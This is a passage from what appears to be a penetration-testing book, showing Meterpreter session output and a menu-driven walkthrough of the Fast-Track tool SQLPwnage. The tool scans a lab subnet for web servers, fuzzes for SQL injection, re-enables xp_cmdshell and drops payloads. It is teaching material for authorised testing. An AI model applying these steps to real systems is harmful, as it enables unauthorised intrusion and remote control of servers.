
172

Chapter 11

[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:4444 -> 10.211.55.128:1030)

meterpreter >

You should now have full access to the machine using the Meterpreter payload.

SQLPwnage

SQLPwnage is a mass brute force attack that can be used against web applications in an attempt to find Microsoft SQL injection. SQLPwnage will scan subnets for web servers on port 80, crawl websites, and attempt to fuzz post parameters until it finds SQL injection. It supports both error- and blind-based SQL injection and will handle everything from privilege escalation to re-enabling the xp_cmdshell stored procedure, bypassing the Windows debug 64KB restriction, and dropping any payload you want onto the system.

Begin the configuration for this attack by selecting Microsoft SQL Tools from the Fast-Track main menu, followed by SQLPwnage, option 2, as shown below.

SQLPwnage Main Menu:

1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND)
2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED)
3. SQL Injection single URL exploitation

Enter your choice: 2

. . . SNIP . . .

Scan a subnet or spider single URL?

1. url
2. subnet (new)
3. subnet (lists last scan)

Enter the Number: 2

Enter the ip range, example 192.168.1.1-254: 10.211.55.1-254

Scanning Complete!!! Select a website to spider or spider all??

1. Single Website
2. All Websites

Enter the Number: 2

Attempting to Spider: http://10.211.55.128
Crawling http://10.211.55.128 (Max Depth: 100000)
DONE
Found 0 links, following 0 urls in 0+0:0:0